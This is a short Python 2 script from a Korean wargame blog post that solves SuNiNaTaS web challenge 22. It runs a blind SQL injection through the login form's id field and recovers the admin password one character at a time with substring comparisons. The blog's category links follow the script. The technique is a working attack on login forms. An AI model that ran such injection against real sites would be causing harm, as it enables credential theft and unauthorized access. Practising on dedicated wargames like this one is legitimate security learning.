import urllib, urllib2, sys

url = "http://suninatas.com/Part_one/web22/web22.asp?"
#string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*()_+|\?><"
key = ""

for i in range(1,11):
    for j in range(30,126):
        dat = {'id': "admin' and (substring(pw,"+str(i)+",1)='"+chr(j)+"')-- ", 'pw': '1'}
        dat = urllib.urlencode(dat)
        req = urllib2.Request(url, dat,headers={'Host':'suninatas.com',
                                                'Cookie': 'ASPSESSIONIDQATDBBCA=HEFDDLLDNHPHJJECHJOCLANO'})
        res = urllib2.urlopen(req).read()
        print "i:"+ str(i) + "j:"+str(j)
        if "color=blue>admin" in res:
            print "[*]Find string! : " + chr(j)
            key += chr(j)
            break
            sys.exit(1)

print "[+]FIND! : " + key

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS binary09번  (0) 2017.05.22
SuNiNaTaS web23번  (0) 2017.03.10
SuNiNaTaS web08번  (0) 2017.03.07
SuNiNaTaS web07번  (0) 2017.03.07
SuNiNaTaS web06번  (0) 2017.03.07

+ Recent posts

티스토리툴바